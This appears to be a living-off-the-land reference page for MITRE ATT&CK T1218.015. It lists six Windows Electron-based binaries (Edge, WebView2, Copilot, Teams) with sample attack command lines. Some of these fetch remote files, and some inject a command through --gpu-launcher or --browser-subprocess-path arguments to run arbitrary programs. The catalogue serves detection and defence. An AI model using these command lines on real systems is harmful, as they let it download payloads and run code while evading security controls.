T1218.015Tactic: Defense EvasionOfficial MITRE ATT&CK Page

T1218.015: Technique T1218.015

Adversaries may leverage living-off-the-land techniques (T1218.015) to achieve execution, evade defenses, or transfer tools.

Total Capable Binaries: 6
Windows: 6
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1218.015

Across 6 verified binaries
Windows3 payloads

Msedge.exe

Microsoft Edge browser

Sample Attack Vector:
msedge.exe {REMOTEURL:.exe.txt}
Windows4 payloads

msedgewebview2.exe

msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.

Sample Attack Vector:
msedgewebview2.exe --no-sandbox --browser-subprocess-path="{PATH_ABSOLUTE:.exe}"
Windows2 payloads

msedge_proxy.exe

Microsoft Edge Browser

Sample Attack Vector:
C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip}
Windows1 payloads

Mscopilot.exe

Microsoft Copilot app

Sample Attack Vector:
mscopilot.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="{CMD} && taskkill /f /im mscopilot.exe &&"
Windows1 payloads

Mscopilot_proxy.exe

Microsoft Copilot proxy launcher

Sample Attack Vector:
mscopilot_proxy.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="cmd.exe /c calc.exe && taskkill /f /im mscopilot.exe &&"
Windows3 payloads

Teams.exe

Electron runtime binary which runs the Teams application

Sample Attack Vector:
teams.exe
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point